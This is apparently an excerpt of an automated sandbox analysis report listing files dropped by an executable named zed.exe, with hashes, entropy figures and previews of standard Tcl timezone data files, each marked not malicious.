                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Famagusta) {.. {-9223372036854775808 8148 0 LMT}.. {-1518920148 7200 0 EET}.. {166572000 10800 1 EEST}.. {182293200 7200 0 EET}.. {200959200 10800 1 EEST}.. {213829200 7200 0 EET}.. {228866400 10800 1 EEST}.. {243982800 7200 0 EET}.. {260316000 10800 1 EEST}.. {276123600 7200 0 EET}.. {291765600 10800 1 EEST}.. {307486800 7200 0 EET}.. {323820000 10800 1 EEST}.. {338936400 7200 0 EET}.. {354664800 10800 1 EEST}.. {370386000 7200 0 EET}.. {386114400 10800 1 EEST}.. {401835600 7200 0 EET}.. {417564000 10800 1 EEST}.. {433285200 7200 0 EET}.. {449013600 10800 1 EEST}.. {465339600 7200 0 EET}.. {481068000 10800 1 EEST}.. {496789200 7200 0 EET}.. {512517600 10800 1 EEST}.. {528238800 7200 0 EET}.. {543967200 10800 1 EEST}.. {559688400 7200 0 EET}.. {575416800 10800 1 EEST}.. {591138000 7200 0 EET}.. {606866400 10800 1 EEST}.. {622587
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8427
                                                                                                                                                                                                                                            Entropy (8bit):3.7494839792487094
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:NyHSd2XK1GbJFp3gP0nPVl8dcqU/8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXaP:NyyIgGbJv3dPAD7c1FoMpHu3Ky3p
                                                                                                                                                                                                                                            MD5:DEB2D261D6885CD83054391D010DE6AD
                                                                                                                                                                                                                                            SHA1:5779B343F4EB2BC75613C593E2FA3A026857F940
                                                                                                                                                                                                                                            SHA-256:A1823EDA63434ACF1A37B3A781A783CFEB6BB4CC53ED0469BB685834837F2289
                                                                                                                                                                                                                                            SHA-512:D024B2D324D981A6792127551B0D466EAFFC5294C84CB5752A71E5267FB2E9162E7EFAED5A5CA3B06BBAD285F62BF955B0EF86DD39307EE5F935FC601F4EEEFA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Gaza) {.. {-9223372036854775808 8272 0 LMT}.. {-2185409872 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-16580
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                                            Entropy (8bit):4.86422571961583
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8qvfXHAIgNtaYFARL/2WFKwHp4WFKdy:SlSWB9vsM3yMPHAIgO8AN/2wKi4wKU
                                                                                                                                                                                                                                            MD5:1BCCB3578FADE993EE8B2C11EAC06CD8
                                                                                                                                                                                                                                            SHA1:CAEAB714E014CD5040C44E4603708B97BC0B03D4
                                                                                                                                                                                                                                            SHA-256:12811A7944B892E3D1C0B4B09057CC1899F28081B3CD47FFD248BA49BA308AF0
                                                                                                                                                                                                                                            SHA-512:1D791DC0E8F45359366DF33C2C337688D2E0E972A90F038733B840D28585505AEF542DDBAD014C9EA8C252048A588CD017DD67A84545A81EDB7C17E3B2E65092
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Shanghai)]} {.. LoadTimeZoneFile Asia/Shanghai..}..set TZData(:Asia/Harbin) $TZData(:Asia/Shanghai)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8402
                                                                                                                                                                                                                                            Entropy (8bit):3.7520828858184325
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:fXSd2XK1GbJFp3gP0nPVl8dcqUZ8O8pc1FoMpQ2NpPfM2g1siiVVfIsuDzhsXa4a:fiIgGbJv3dPADPc1FoMpHu3Ky3p
                                                                                                                                                                                                                                            MD5:6F176787C7FC5764A63719F0041690BA
                                                                                                                                                                                                                                            SHA1:C292A8CEA597D7FD9E2D071AB7AE93E7ABCA21A5
                                                                                                                                                                                                                                            SHA-256:732CAA355542C8781C61FC8F5265EBFC59C8CC24E78D01011E1E3256E6B34DC7
                                                                                                                                                                                                                                            SHA-512:EE8F39A3D65D75E14B59B4D9CCB27894210CA269E82A7AC7F98BE67764688A8895EBB9C1ACEAB4C1B368B4F1BC5AFCB34E8866CEDFD91232926DF47517096513
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hebron) {.. {-9223372036854775808 8423 0 LMT}.. {-2185410023 7200 0 EEST}.. {-933638400 10800 1 EEST}.. {-923097600 7200 0 EEST}.. {-919036800 10800 1 EEST}.. {-857347200 7200 0 EEST}.. {-844300800 10800 1 EEST}.. {-825811200 7200 0 EEST}.. {-812678400 10800 1 EEST}.. {-794188800 7200 0 EEST}.. {-779846400 10800 1 EEST}.. {-762652800 7200 0 EEST}.. {-748310400 10800 1 EEST}.. {-731116800 7200 0 EEST}.. {-682653600 7200 0 EET}.. {-399088800 10800 1 EEST}.. {-386650800 7200 0 EET}.. {-368330400 10800 1 EEST}.. {-355114800 7200 0 EET}.. {-336790800 10800 1 EEST}.. {-323654400 7200 0 EET}.. {-305168400 10800 1 EEST}.. {-292032000 7200 0 EET}.. {-273632400 10800 1 EEST}.. {-260496000 7200 0 EET}.. {-242096400 10800 1 EEST}.. {-228960000 7200 0 EET}.. {-210560400 10800 1 EEST}.. {-197424000 7200 0 EET}.. {-178938000 10800 1 EEST}.. {-165
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):395
                                                                                                                                                                                                                                            Entropy (8bit):4.431055857167822
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862RLmdHneCvhYC5sF/p+zHHviViksF/dMUYPsF/RQ9EsV:5de3vhd5sFR+znv2vsFlM/PsFVsV
                                                                                                                                                                                                                                            MD5:A49A3D55C1E10A37125C51F9C6363868
                                                                                                                                                                                                                                            SHA1:7C1B5D44643ADC3F02681F6379E82C3F4512F0C1
                                                                                                                                                                                                                                            SHA-256:D8A19C70BE5A9AE1E6091DC8FD03D7719110D1F3D78786C91D5BD0949FB5A428
                                                                                                                                                                                                                                            SHA-512:804C44E51BB9E93B156B0CB4CB125651003B3C42D65334A052BE149734221315CC75D4FBDE34F62DFC102F1A9C968D1C9B573839C7ECBF7397B61BD90E530B20
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Ho_Chi_Minh) {.. {-9223372036854775808 25590 0 LMT}.. {-2004073590 25590 0 PLMT}.. {-1851577590 25200 0 +07}.. {-852105600 28800 0 +08}.. {-782643600 32400 0 +09}.. {-767869200 25200 0 +07}.. {-718095600 28800 0 +08}.. {-457776000 25200 0 +07}.. {-315648000 28800 0 +08}.. {171820800 25200 0 +07}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2226
                                                                                                                                                                                                                                            Entropy (8bit):4.0055033036300145
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5Ze9l9Pm4yoHtTYJJIX1Zcp6GS0j1SPQpP6gPE8fTZIPNYQGm75st/nQdwi9:DyaoTcwQt6EsQTng
                                                                                                                                                                                                                                            MD5:26BCBBA28AE34FE3CF7D17EF4C6B69C8
                                                                                                                                                                                                                                            SHA1:5324DEA8E7965C66650E7B4769EFA1297B508486
                                                                                                                                                                                                                                            SHA-256:EE9A6997BC1AAD4A8FA95DB312774C3F37FBB895549230C30FC66C02CC170EB6
                                                                                                                                                                                                                                            SHA-512:54594CD18838B4A8947EBB5BDE2415727CC127CF79AEC98FC0F5D5A32F68EEAF4E079853239DE9F753CE90F18EFD55AE51FC43D64E313666CEA0EF8AC93BF065
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hong_Kong) {.. {-9223372036854775808 27402 0 LMT}.. {-2056690800 28800 0 HKT}.. {-900910800 32400 1 HKST}.. {-891579600 30600 1 HKWT}.. {-884248200 32400 0 JST}.. {-761209200 28800 0 HKT}.. {-747907200 32400 1 HKST}.. {-728541000 28800 0 HKT}.. {-717049800 32400 1 HKST}.. {-697091400 28800 0 HKT}.. {-683785800 32400 1 HKST}.. {-668061000 28800 0 HKT}.. {-654755400 32400 1 HKST}.. {-636611400 28800 0 HKT}.. {-623305800 32400 1 HKST}.. {-605161800 28800 0 HKT}.. {-591856200 32400 1 HKST}.. {-573712200 28800 0 HKT}.. {-559801800 32400 1 HKST}.. {-541657800 28800 0 HKT}.. {-528352200 32400 1 HKST}.. {-510211800 28800 0 HKT}.. {-498112200 32400 1 HKST}.. {-478762200 28800 0 HKT}.. {-466662600 32400 1 HKST}.. {-446707800 28800 0 HKT}.. {-435213000 32400 1 HKST}.. {-415258200 28800 0 HKT}.. {-403158600 32400 1 HKST}.. {-383808600 28800 0 HKT
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1583
                                                                                                                                                                                                                                            Entropy (8bit):3.7521760184466206
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5x3LecCvgsFFFKOksF8FpsF71FQnsFNFxhsFlF6sFaFasFZFisF8GF5sFKLFAZsZ:5FqKVx8Cq9f/y2L
                                                                                                                                                                                                                                            MD5:A77140A0D8C2D3E2993E4BA7CADFB4C6
                                                                                                                                                                                                                                            SHA1:AE3586264A86D42F578D4B0F7A30C9BE6047EAB1
                                                                                                                                                                                                                                            SHA-256:CA88A45E954A9854C680B399E69E4858BF5E861FABFADC19D62D97B734B25415
                                                                                                                                                                                                                                            SHA-512:05EA9D903EEC755F799B7C2399ED933245A5AE3A594648FE37AF1CE7699AE499B4ED159F428D91259D80BC9AF5117F2DA055A506AED94E5281C38B7AFF69C6FE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Hovd) {.. {-9223372036854775808 21996 0 LMT}.. {-2032927596 21600 0 +06}.. {252439200 25200 0 +07}.. {417978000 28800 1 +07}.. {433785600 25200 0 +07}.. {449600400 28800 1 +07}.. {465321600 25200 0 +07}.. {481050000 28800 1 +07}.. {496771200 25200 0 +07}.. {512499600 28800 1 +07}.. {528220800 25200 0 +07}.. {543949200 28800 1 +07}.. {559670400 25200 0 +07}.. {575398800 28800 1 +07}.. {591120000 25200 0 +07}.. {606848400 28800 1 +07}.. {622569600 25200 0 +07}.. {638298000 28800 1 +07}.. {654624000 25200 0 +07}.. {670352400 28800 1 +07}.. {686073600 25200 0 +07}.. {701802000 28800 1 +07}.. {717523200 25200 0 +07}.. {733251600 28800 1 +07}.. {748972800 25200 0 +07}.. {764701200 28800 1 +07}.. {780422400 25200 0 +07}.. {796150800 28800 1 +07}.. {811872000 25200 0 +07}.. {828205200 28800 1 +07}.. {843926400 25200 0 +07}.. {859654800
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2089
                                                                                                                                                                                                                                            Entropy (8bit):3.7296034934492694
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5PZy4DdOKStci4KjXoYjoSvfQJWE00dtT43kgiTskNrrBizhzRBqY3M:Py2/svfraBGfgP
                                                                                                                                                                                                                                            MD5:C9F7AC464970567E5C38CB01ED2297AE
                                                                                                                                                                                                                                            SHA1:453718BACCAE3FACD761AF22CA5875185478ADDD
                                                                                                                                                                                                                                            SHA-256:61BAAAD6315FFBDAED6F266880165B06ECCAF72F660B7FB01C8B654F3952D68E
                                                                                                                                                                                                                                            SHA-512:72044EFAE262CC12974F2DE2AAF06AC4C31BE73071ACD53DDC6B8D8BFC6FBDF937EC03DC881901F730659BDE662FBCFC76C57B2C086DAA97F160530464FBA7C6
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Irkutsk) {.. {-9223372036854775808 25025 0 LMT}.. {-2840165825 25025 0 IMT}.. {-1575874625 25200 0 +07}.. {-1247554800 28800 0 +09}.. {354902400 32400 1 +09}.. {370710000 28800 0 +08}.. {386438400 32400 1 +09}.. {402246000 28800 0 +08}.. {417974400 32400 1 +09}.. {433782000 28800 0 +08}.. {449596800 32400 1 +09}.. {465328800 28800 0 +08}.. {481053600 32400 1 +09}.. {496778400 28800 0 +08}.. {512503200 32400 1 +09}.. {528228000 28800 0 +08}.. {543952800 32400 1 +09}.. {559677600 28800 0 +08}.. {575402400 32400 1 +09}.. {591127200 28800 0 +08}.. {606852000 32400 1 +09}.. {622576800 28800 0 +08}.. {638301600 32400 1 +09}.. {654631200 28800 0 +08}.. {670356000 25200 0 +08}.. {670359600 28800 1 +08}.. {686084400 25200 0 +07}.. {695761200 28800 0 +09}.. {701805600 32400 1 +09}.. {717530400 28800 0 +08}.. {733255200 32400 1 +09}.. {748
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                                            Entropy (8bit):4.9013773460609
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqxV0XaDovXHAIgoq3XRFvHRL/2WFK4HB/8QaqXKv:SlSWB9vsM3ymQa2HAIgoQ/HN/2wK4HJa
                                                                                                                                                                                                                                            MD5:8A92C690BE27A69D122BFF51479B7B56
                                                                                                                                                                                                                                            SHA1:52DB64587A347F34153A51788BDE8C349D966575
                                                                                                                                                                                                                                            SHA-256:1F77C4BD27574E1D2066885DEF01806A02D3E444424A219A8EC5C114F89665E5
                                                                                                                                                                                                                                            SHA-512:FEDF57C4862B6792A789F339EB1027EC8A8472B01B7D1D0814C419850B9AC03A7B454FDB04D8BECE166E9A8BCAA58B0B461007A6C824B30B1080991A1DB49CCA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Europe/Istanbul)]} {.. LoadTimeZoneFile Europe/Istanbul..}..set TZData(:Asia/Istanbul) $TZData(:Europe/Istanbul)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):370
                                                                                                                                                                                                                                            Entropy (8bit):4.4733192761103515
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKcrJfDm2OHATJeoHMaSYov/YSZkc5q/MVSSFFWSyvScH+dMVSSFL+:MB862EJLmdHjCEdOc5aMxaSyHHaMxF6P
                                                                                                                                                                                                                                            MD5:C689A1AA9FFE535AEB3AD3D7EDE55172
                                                                                                                                                                                                                                            SHA1:0520FC9A4619FB555A79C5DF2AE82422BF2C5EDA
                                                                                                                                                                                                                                            SHA-256:2F39D9F93761B85C254F458317A7DE2B4184BE9459F2193A85C08662E801269A
                                                                                                                                                                                                                                            SHA-512:C1034FB2FCFEF201C5362AF21B048B6637A824C5C93D75854CF3807892C772CD4376533E58BFF8D8726F531F43CB231365B8012EBD3C1BECED865D3CD2D6673D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jakarta) {.. {-9223372036854775808 25632 0 LMT}.. {-3231299232 25632 0 BMT}.. {-1451719200 26400 0 +0720}.. {-1172906400 27000 0 +0730}.. {-876641400 32400 0 +09}.. {-766054800 27000 0 +0730}.. {-683883000 28800 0 +08}.. {-620812800 27000 0 +0730}.. {-189415800 25200 0 WIB}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):213
                                                                                                                                                                                                                                            Entropy (8bit):4.834345288972067
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/2wKcaDm2OHG4YoH1kcfvScHVowkVcr2CV4zvhyov:MB862PmdHNYC6cfHHVop2NVkoov
                                                                                                                                                                                                                                            MD5:2CB3A13FCC48F8C4457E001FC309918B
                                                                                                                                                                                                                                            SHA1:83174176815CB93D216B5BC532C120EC8AC433CF
                                                                                                                                                                                                                                            SHA-256:761C1E80FEBF46D6D6215CEBF211F121974156D9BCE2FB4258C1074C6ED2CE22
                                                                                                                                                                                                                                            SHA-512:65009020AB9FEC2F8158A4851A78B71127F9B262DDD1472583942E19B7C086304F54BC8DAE5A40BD1448BCAEDA0FDBACCD19400E10FFA0357E324535F9036EF0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jayapura) {.. {-9223372036854775808 33768 0 LMT}.. {-1172913768 32400 0 +09}.. {-799491600 34200 0 +0930}.. {-189423000 32400 0 WIT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8135
                                                                                                                                                                                                                                            Entropy (8bit):3.770028446231146
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:GKfnxFAEX/nPVl8diAg9oEhH20AHz7LzdWhYbBJPXuVhKaM76Rmg4DLeEcNptv5C:7ffBvPAzF0AHzPzdD1+XBRF0
                                                                                                                                                                                                                                            MD5:884227D48C92BA6C519BFE571D4F1037
                                                                                                                                                                                                                                            SHA1:21F8977816C2B439686A50D353B836A6D132A946
                                                                                                                                                                                                                                            SHA-256:0BDC2C693134199C2ECD374CC01468813DB29DF47422C706A3EA2BE5ECCA177A
                                                                                                                                                                                                                                            SHA-512:8A09F1FE11DAD203501A16FE6A2CAEC969FE3553B456B8BD1997E55B3EE430B2BB4B54F7D87C5E99931FD96E7C769CAA618C777EBD23FBD1E1A0F57409422914
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Jerusalem) {.. {-9223372036854775808 8454 0 LMT}.. {-2840149254 8440 0 JMT}.. {-1641003640 7200 0 IST}.. {-933638400 10800 1 IDT}.. {-923097600 7200 0 IST}.. {-919036800 10800 1 IDT}.. {-857347200 7200 0 IST}.. {-844300800 10800 1 IDT}.. {-825811200 7200 0 IST}.. {-812678400 10800 1 IDT}.. {-794188800 7200 0 IST}.. {-779846400 10800 1 IDT}.. {-762652800 7200 0 IST}.. {-748310400 10800 1 IDT}.. {-731116800 7200 0 IST}.. {-681955200 14400 1 IDDT}.. {-673228800 10800 1 IDT}.. {-667958400 7200 0 IST}.. {-652320000 10800 1 IDT}.. {-636422400 7200 0 IST}.. {-622080000 10800 1 IDT}.. {-608947200 7200 0 IST}.. {-591840000 10800 1 IDT}.. {-572486400 7200 0 IST}.. {-558576000 10800 1 IDT}.. {-542851200 7200 0 IST}.. {-527731200 10800 1 IDT}.. {-514425600 7200 0 IST}.. {-490838400 10800 1 IDT}.. {-482976000 7200 0 IST}.. {-459388800 10800 1 I
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):180
                                                                                                                                                                                                                                            Entropy (8bit):4.8546989169864085
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKTtNMXGm2OHodFxsYoHvgVHURRNVsRYovFFFkdj/cXHF:SlSWB9eg/2wKTPDm2OHoH+YoHvgVHURA
                                                                                                                                                                                                                                            MD5:9BD9B21661C235C0794078EC98978D3B
                                                                                                                                                                                                                                            SHA1:3D854780F49D0E5F5A190DC9367C7406127C5E4D
                                                                                                                                                                                                                                            SHA-256:A59C95C038F2E945D685D96FA9B859CE82A643A1B7F56EB36B2C809DE91CD4BA
                                                                                                                                                                                                                                            SHA-512:A76E99CF03DA8897F0A210A98DB79E4CD60070F2BE363D0D0960D9882919F9B49978FA55BB2500F1648ADD4080730CAD85BAFF61D885A9EAD394AC04C850F6BA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kabul) {.. {-9223372036854775808 16608 0 LMT}.. {-2524538208 14400 0 +04}.. {-788932800 16200 0 +0430}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2060
                                                                                                                                                                                                                                            Entropy (8bit):3.788131608921229
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5+SeWI/2kkWk7YFpR2kHmxCcUdBbcHDLV2vpXt25A0UeRr9ydzkMfF6USRWk9UuV:5i/2ZsFLrcZwvJt2F+doTr9Q3G80
                                                                                                                                                                                                                                            MD5:390F39934F095F89358B73D056D90264
                                                                                                                                                                                                                                            SHA1:6B57CE5346B50ED88BFBB6BC57F834FB3F564905
                                                                                                                                                                                                                                            SHA-256:6E0278E389072437BC07A5032CD58E9E5B1B2BDB20918632C422EFA97BC43ABF
                                                                                                                                                                                                                                            SHA-512:6C54D94E95D73030F2FFCF8D130494CBD79FB1CEB9B59ADE0743C10F02557C3DD59CC6274B262A7E29C2D4C35DDA4B6A9A0398C661F5BD40F3B92181192B9577
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Kamchatka) {.. {-9223372036854775808 38076 0 LMT}.. {-1487759676 39600 0 +11}.. {-1247569200 43200 0 +13}.. {354888000 46800 1 +13}.. {370695600 43200 0 +12}.. {386424000 46800 1 +13}.. {402231600 43200 0 +12}.. {417960000 46800 1 +13}.. {433767600 43200 0 +12}.. {449582400 46800 1 +13}.. {465314400 43200 0 +12}.. {481039200 46800 1 +13}.. {496764000 43200 0 +12}.. {512488800 46800 1 +13}.. {528213600 43200 0 +12}.. {543938400 46800 1 +13}.. {559663200 43200 0 +12}.. {575388000 46800 1 +13}.. {591112800 43200 0 +12}.. {606837600 46800 1 +13}.. {622562400 43200 0 +12}.. {638287200 46800 1 +13}.. {654616800 43200 0 +12}.. {670341600 39600 0 +12}.. {670345200 43200 1 +12}.. {686070000 39600 0 +11}.. {695746800 43200 0 +13}.. {701791200 46800 1 +13}.. {717516000 43200 0 +12}.. {733240800 46800 1 +13}.. {748965600 43200 0 +12}.. {764
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):457
                                                                                                                                                                                                                                            Entropy (8bit):4.396286144160272
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB862dmdH35Cy6DvjeQXvjKEn6vNEhFc0bkTfb2iWToN1:5de3IjjeQ/jKE6vNNa8
                                                                                                                                                                                                                                            MD5:DF604BCD42A3C1E6BABD0E4FF5764CA3
                                                                                                                                                                                                                                            SHA1:984111F3A75EE7D8760AA2B839010545AF8EE359
                                                                                                                                                                                                                                            SHA-256:4E7F7ACAE8B4018A835328744F680C8054771805BB0BB07678A09737963C090D
                                                                                                                                                                                                                                            SHA-512:690AC3FC7CA3C66AA70F17E38C6B43FFACAB3F86040C3BA94FBFF80AC8C1AECF8192E503282109DABF3228F8DC73C732F1041C80455B8B26BDB25C4C32FA286A
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:Asia/Karachi) {.. {-9223372036854775808 16092 0 LMT}.. {-1988166492 19800 0 +0530}.. {-862637400 23400 1 +0630}.. {-764145000 19800 0 +0530}.. {-576135000 18000 0 +05}.. {38775600 18000 0 PKT}.. {1018119600 21600 1 PKST}.. {1033840800 18000 0 PKT}.. {1212260400 21600 1 PKST}.. {1225476000 18000 0 PKT}.. {1239735600 21600 1 PKST}.. {1257012000 18000 0 PKT}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):174
                                                                                                                                                                                                                                            Entropy (8bit):4.967143524972358
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyq8s4YkyXHAIgNrYOARL/2WFKu3e2WFKjov:SlSWB9vsM3yMGSHAIgvAN/2wKulwKjy
                                                                                                                                                                                                                                            MD5:259662F35AA09A891C2DDF8FCFECD6F0
                                                                                                                                                                                                                                            SHA1:DBB3A363A34C33F0B6B0D677E43C2985E2BAF976
                                                                                                                                                                                                                                            SHA-256:7B2251F0A41CBADF45D69F24604834167B14D8D33B510E635719AB404CABBCE2
                                                                                                                                                                                                                                            SHA-512:CD7E514555D58985C774535556B66542EFC5FB7CD5891F42FE21B591612CB7EBD4B41E96593E26E9283BA1B01EF3BE0FDFAE871F5EF6ADF2286AF1E479DCB44B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(Asia/Urumqi)]} {.. LoadTimeZoneFile Asia/Urumqi..}..set TZData(:Asia/Kashgar) $TZData(:Asia/Urumqi)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):185
                                                                                                                                                                                                                                            Entropy (8bit):4.896398105471451
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:SlEVFRKvJT8QF08x/2WFKXIi7hvXMXGm2OHF+VT5oHsQKwMTXvv6Q6zRk8P4VvW/:SlSWB9eg/2wKYghfDm2OH0T5oHxNMzv8
                                                                                                                                                                                                                                            MD5:7AC6429D2A08372C71C61B4521246FEC
                                                                                                                                                                                                                                            SHA1:6E50F5AD1018398491453D751F8B717B618EF46E
                                                                                                                                                                                                                                            SHA-256:F0A0816E62036637F75081CBF17A1E6B8FBC2D86AEC3CD2E234BBBDD6EC9F109
